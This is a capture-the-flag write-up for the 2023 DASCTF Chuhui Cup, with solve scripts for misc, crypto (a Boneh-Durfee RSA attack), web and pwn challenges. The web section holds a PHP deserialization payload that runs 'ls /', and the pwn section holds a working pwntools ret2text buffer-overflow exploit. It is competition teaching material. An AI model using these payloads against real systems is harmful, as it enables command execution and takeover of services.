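2023 Chuhui Cup (DASCTF) Writeup

How should I put it: the competition felt a bit tight on time. There were 15 challenges in 3 hours, and the writeup had to be submitted before the end, so there wasn't quite enough time, and the writeup we submitted was written in a hurry. Another gripe is that you couldn't see the live ranking during the competition and could only guess blindly from the score, which was rather uncomfortable (at one point our team's score dropped to 0.7 and I thought we were going to be eliminated...).

In the end we finished second, one challenge short of first place.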


 MISC

ez_zip


Use this script from B神 to unpack the nested zip archives:

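```python
import io
import zipfile

# The challenge attachment: a zip that contains a zip that contains a zip ...
with open("ez_zip的附件.zip", "rb") as f:
    data = f.read()

info = "taptap"

while True:
    with zipfile.ZipFile(io.BytesIO(data), "r") as zf:
        all_files_processed = True
        for i in zf.filelist:
            # zipfile decodes non-UTF-8 names as cp437; re-decode them as GBK
            fileName = i.filename.encode("cp437").decode("gbk")
            if zipfile.is_zipfile(io.BytesIO(zf.read(i.filename))):
                # Another archive layer: keep unpacking it in memory
                print(fileName)
                data = zf.read(i.filename)
                all_files_processed = False

                info += f" {fileName.replace('.zip', '')}"
            else:
                # A regular file: write it out. fileName comes from the
                # archive itself, so run this only in a scratch directory.
                print(fileName)
                with open(fileName, "wb") as f:
                    f.write(zf.read(i.filename))

        if all_files_processed:
            break

print(info)
```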

This yields a file named 1.txt.

Replace every plus sign with 1 and every minus sign with 0.


Convert the binary to ASCII to get the flag:

DASCTF{10c58258ccf1e7c631e5911ed6acc4ed}

gb2312-80


First, write a script that draws images from the bitmap (dot-matrix) data:

```python
from PIL import Image

def draw(s, ind):
    # s: 256 characters of '0'/'1' in row-major order; saved as <ind>.png
    lt = list(s)
    i2 = Image.new("RGB", (16, 16))
    for h in range(16):
        for w in range(16):
            x = lt[h * 16 + w]
            color = (0, 0, 0) if x == '0' else (255, 255, 255)
            i2.putpixel((w, h), color)
    i2.save(str(ind) + ".png")

def trans(s):
    # "r0,r1,...,r15" (one integer per 16-pixel row) -> 256-character bit string
    lt = s.split(',')
    out = ''.join(bin(int(x))[2:].zfill(16) for x in lt)
    return out

# One glyph per line of cipher.txt
with open('cipher.txt', 'r') as f:
    for ind, line in enumerate(f):
        line = line.strip()
        draw(trans(line), ind)
```


Work out which bitmap corresponds to which character, then write a script to do the conversion:

```python
# Row values of each 16x16 glyph -> the hex digit it depicts
glyphs = {
    '0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0':'0',
    '0,0,128,896,384,384,384,384,384,384,384,384,384,960,0,0':'1',
    '0,0,960,1632,3120,3120,48,48,96,192,384,784,1552,4080,0,0':'2',
    '0,0,960,1632,3120,48,96,448,96,48,48,3120,1632,960,0,0':'3',
    '0,64,192,448,960,704,1728,3264,3264,6336,8176,192,192,480,0,0':'4',
    '0,0,4080,3072,3072,3072,4032,3680,48,48,48,3120,1632,960,0,0':'5',
    '0,0,960,1632,3120,3072,3520,3680,3120,3120,3120,3120,1632,960,0,0':'6',
    '0,0,4080,4080,2096,96,192,192,384,384,768,768,768,768,0,0':'7',
    '0,0,960,1632,3120,3120,1632,960,1632,3120,3120,3120,1632,960,0,0':'8',
    '0,0,960,1632,3120,3120,3120,3120,1648,1008,48,3120,1632,960,0,0':'9',
    '0,0,0,0,0,0,1984,3168,96,2016,3168,3168,2008,0,0,0':'a',
    '0,0,3584,1536,1536,1536,2016,1560,1560,1560,1560,1560,3056,0,0,0':'b',
    '0,0,0,0,0,0,992,3120,3072,3072,3072,3120,2016,0,0,0':'c',
    '0,0,224,96,96,96,2016,3168,3168,3168,3168,3168,2000,0,0,0':'d',
    '0,0,0,0,0,0,992,3120,3120,4080,3072,3120,2016,0,0,0':'e',
    '0,0,240,408,384,384,2016,384,384,384,384,384,960,0,0,0':'f'
}

# Each line of cipher.txt is one glyph; print the hex digit it stands for
with open('cipher.txt', 'r') as f:
    for line in f:
        line = line.strip('\n')
        print(glyphs[line], end='')
```

Hex-decode the resulting data and save it as a zip. It contains a hint.txt, which holds more bitmap data:

from PIL import Image
def draw(s,ind):
    lt = list(s)
    i2=Image.new("RGB",(16,16))
    _ind = 0
    for h in range(16):
        for w in range(16):
            x = lt[_ind]
            if x == '0':
                i2.putpixel((w, h), (0,0,0))
            else:
                i2.putpixel((w, h), (255,255,255))
            _ind += 1
    i2.save(str(ind)+".png")

s = '''0000001000000000000000010000000001111111111111100100001000000010100010010010010000101000110010000100101100000100000011000001000001110111111100000000000100000000001000010000100000100001000010000010000100001000001000010000100000111111111110000010000000001000
0000100000010000111111111111100000010000000100000001000100010000001000010001000000100101000100000011111100010000011001010001010010100101111111100010010000000100001001000010010000100111111101000010010000000100001111000000010000100100000101000000000000001000
0000111111100000000010000010000000001000001000000000111111100000000010000010000000001000001000000000111111100000000000000000010011111111111111100000000100000000000010010010000000001001111100000000100100000000000101010000000000100011000001100100000011111100
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000011110000000000001111000000000000011000000000000000000000000000000110000000000000111100000000000011110000000000000110000000000000000000000000
0000000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000
0000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000
0000000000000000000000000000000000000011111000000000011000110000000011000001100000011000000011000001100000001100000110000000110000011000000011000001100000001100000110000000110000001100000110000000011000110000000000111110000000000000000000000000000000000000
0000000000000000000000000000000000111100000111000001100000001000000110000000100000011000000100000000110000010000000011000010000000001100001000000000011001000000000001100100000000000010100000000000001110000000000000010000000000000000000000000000000000000000
0000000000000000000000000000000000011111111110000000110000011000000011000000100000001100000000000000110000100000000011111110000000001100001000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000
0000000000000000000000000000000000011110001111000000110000011000000011000001100000001100000110000000110000011000000011111111100000001100000110000000110000011000000011000001100000001100000110000000110000011000000111100011110000000000000000000000000000000000
0000000000000000000000000000000000111111111110000010000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000010000011000000011000001111111111100000000000000000000000000000000000
0000000000000000000000000000000000011110011111000000110000110000000011000110000000001100110000000000110110000000000011111000000000001101110000000000110011100000000011000111000000001100001110000000110000011100000111100001111000000000000000000000000000000000
0000000000000000000000000000000000000000100000000000001110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000
0000000000000000000000000000000000000011110000000000011001100000000011000011000000001100000000000000110111000000000011100110000000001100001100000000110000110000000011000011000000001100001100000000011001100000000000111100000000000000000000000000000000000000'''
lt = s.split('\n')
ind = 0
for i in lt:
    draw(i,ind)
    ind+=1

Convert these glyphs as well; the password turns out to be ILOVEHZK16.


 DASCTF{842a99305a07e6183830582d1740c1b1}
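The two glyph encodings in this challenge (16 row integers per line in cipher.txt, a 256-character bit string per line in hint.txt) describe the same 16x16 bitmaps, so a glyph seen in one form can be matched against a table built from the other. The following is an added example, not part of the original write-up, that normalises both forms and renders a glyph as text so it can be read without opening PNG files; the helper names are hypothetical and the sample glyph is the '1' entry from the table above.

```python
# Added example: helper names are hypothetical, not from the write-up.

# Row-integer form of the glyph that the table above maps to '1'.
GLYPH_ONE = "0,0,128,896,384,384,384,384,384,384,384,384,384,960,0,0"

def rows_from_csv(line):
    """cipher.txt form: 16 comma-separated integers, one per pixel row."""
    rows = [int(x) for x in line.strip().split(",")]
    if len(rows) != 16 or any(not 0 <= r < 1 << 16 for r in rows):
        raise ValueError("expected 16 row values in range 0..65535")
    return rows

def rows_from_bits(bits):
    """hint.txt form: 256 characters of '0'/'1' in row-major order."""
    bits = bits.strip()
    if len(bits) != 256 or set(bits) - {"0", "1"}:
        raise ValueError("expected 256 binary digits")
    return [int(bits[i:i + 16], 2) for i in range(0, 256, 16)]

def bits_from_rows(rows):
    """Inverse of rows_from_bits."""
    return "".join(format(r, "016b") for r in rows)

def render(rows):
    """Return the glyph as 16 text lines, '#' for a set pixel."""
    return [format(r, "016b").replace("0", ".").replace("1", "#") for r in rows]

def lookup(rows, table):
    """Map a glyph to a character via a {csv_key: char} table; '?' if unknown."""
    return table.get(",".join(map(str, rows)), "?")

if __name__ == "__main__":
    rows = rows_from_csv(GLYPH_ONE)
    print("\n".join(render(rows)))
    # The same glyph in bit-string form resolves through the same table.
    print(lookup(rows_from_bits(bits_from_rows(rows)), {GLYPH_ONE: "1"}))
```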

CRYPTO

so-large-e

Read e and n from the public key:

```python
from Crypto.PublicKey import RSA

# Read the public key file
with open('pub.pem', 'r') as f:
    key = RSA.importKey(f.read())
n = key.n
e = key.e
c = 6838759631922176040297411386959306230064807618456930982742841698524622016849807235726065272136043603027166249075560058232683230155346614429566511309977857815138004298815137913729662337535371277019856193898546849896085411001528569293727010020290576888205244471943227253000727727343731590226737192613447347860
print('n=', n)
print('e=', e)

# Printed values:
n = 116518679305515263290840706715579691213922169271634579327519562902613543582623449606741546472920401997930041388553141909069487589461948798111698856100819163407893673249162209631978914843896272256274862501461321020961958367098759183487116417487922645782638510876609728886007680825340200888068103951956139343723
e = 113449247876071397911206070019495939088171696712182747502133063172021565345788627261740950665891922659340020397229619329204520999096535909867327960323598168596664323692312516466648588320607291284630435682282630745947689431909998401389566081966753438869725583665294310689820290368901166811028660086977458571233
```

e is very large, so use the Boneh-Durfee attack.

Conditions for use:


Modify delta:

```python
# from __future__ import print_function
# import time
#
# ############################################
# # Config
# ##########################################
#
# """
# Setting debug to true will display more information
# about the lattice, the bounds, the vectors...
# """
# debug = True
#
# """
# Setting strict to true will stop the algorithm (and
# return (-1, -1)) if we don't have a correct
# upperbound on the determinant. Note that this
# doesn't necessarily mean that no solutions
# will be found since the theoretical upperbound is
# usually far away from actual results. That is why
# you should probably use `strict = False`
# """
# strict = False
#
# """
# This is experimental, but has provided remarkable results
# so far. It tries to reduce the lattice as much as it can
# while keeping its efficiency. I see no reason
```

```python
from Crypto.Util.number import long_to_bytes

c = 6838759631922176040297411386959306230064807618456930982742841698524622016849807235726065272136043603027166249075560058232683230155346614429566511309977857815138004298815137913729662337535371277019856193898546849896085411001528569293727010020290576888205244471943227253000727727343731590226737192613447347860
n = 116518679305515263290840706715579691213922169271634579327519562902613543582623449606741546472920401997930041388553141909069487589461948798111698856100819163407893673249162209631978914843896272256274862501461321020961958367098759183487116417487922645782638510876609728886007680825340200888068103951956139343723
e = 113449247876071397911206070019495939088171696712182747502133063172021565345788627261740950665891922659340020397229619329204520999096535909867327960323598168596664323692312516466648588320607291284630435682282630745947689431909998401389566081966753438869725583665294310689820290368901166811028660086977458571233
# Private exponent recovered by the Boneh-Durfee script
d = 663822343397699728953336968317794118491145998032244266550694156830036498673227937

# Decrypt with the recovered d
m = long_to_bytes(int(pow(c, d, n)))
print(m)
```
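As an added example (not part of the original write-up), the check below shows why delta had to be changed: it computes the delta for which d = n^delta and tells which small-exponent bound the key falls under, using the known bounds d < n^(1/4)/3 for Wiener's attack and d < n^0.292 for Boneh-Durfee. It also confirms that a recovered d matches (n, e) without factoring n. The values n, e and d are copied from the scripts above; the function names are hypothetical.

```python
# Added example: function names are hypothetical; n, e, d come from the write-up.
import math

n = 116518679305515263290840706715579691213922169271634579327519562902613543582623449606741546472920401997930041388553141909069487589461948798111698856100819163407893673249162209631978914843896272256274862501461321020961958367098759183487116417487922645782638510876609728886007680825340200888068103951956139343723
e = 113449247876071397911206070019495939088171696712182747502133063172021565345788627261740950665891922659340020397229619329204520999096535909867327960323598168596664323692312516466648588320607291284630435682282630745947689431909998401389566081966753438869725583665294310689820290368901166811028660086977458571233
d = 663822343397699728953336968317794118491145998032244266550694156830036498673227937

def delta_of(n, d):
    """Exponent delta such that d = n**delta."""
    return math.log(d) / math.log(n)

def small_d_regime(n, d):
    """Which classical small-private-exponent bound d falls under."""
    if 81 * d**4 < n:                  # Wiener: d < n^(1/4) / 3
        return "wiener"
    if delta_of(n, d) < 0.292:         # Boneh-Durfee: d < n^0.292
        return "boneh-durfee"
    return "none"

def key_pair_consistent(n, e, d, bases=(2, 3, 5)):
    """True if x^(e*d) == x (mod n) for a few bases; needs no factors of n."""
    return all(pow(pow(x, e, n), d, n) == x for x in bases)

if __name__ == "__main__":
    print(f"delta = {delta_of(n, d):.4f}, regime = {small_d_regime(n, d)}")
    print("d matches (n, e):", key_pair_consistent(n, e, d))
```

The delta configured in the lattice script has to be larger than the value printed here, and generating keys whose d lies well above n^0.292 is what keeps a key out of reach of both attacks.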

matrixequation


Straight to the script:

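```python
# SageMath. E, hint1, hint2 and hint3 must first be defined as matrices
# taken from the challenge output.
U = hint2/hint1
R = (hint3/U/hint1/U/hint1/U/hint1/U/hint1).inverse()
A = U.inverse()*E-R
alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()'
flag = ''
# Read 24 entries of A, stepping 5 cells at a time through its 11-column rows
for k in range(24):
    i, j = 5*k // 11, 5*k % 11
    flag += alphabet[A[i, j]]
print(flag)
```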

Fill in E, hint1, hint2 and hint3 from the output.

Every 11 rows make up one matrix.

WEB

eaaeval


Submitting this username and password redirects to another page, dhwiaoubfeuobgeobg.php.

Directory brute-forcing turns up www.zip.


It is a deserialization issue, and a bypass is needed.


O:4:"Flag":2:{s:1:"a";s:2:"ls";s:1:"b";s:1:"/";}

This runs ls / to see where the flag is.


Bypass the restriction to read flag.txt.


PWN

ez_base


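Find the start function, and from there find our vuln function.

Debugging shows a stack overflow vulnerability at sub    .

Searching the strings table for "flag" leads to the backdoor function.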


What follows is then a very simple ret2text:

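```python
from pwn import *

# p = process("./base")
p = remote("tcp.cloud.dasctf.com", 23938)
p.recvuntil(b"2:decode")
p.sendline(b"1")                  # select menu option 1
p.recvuntil(b"cin de_str:")
# 0x28 bytes of padding, then the return target (the backdoor found above)
p.sendline(b"q" * 0x28 + p64(0x404911))
p.interactive()
```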
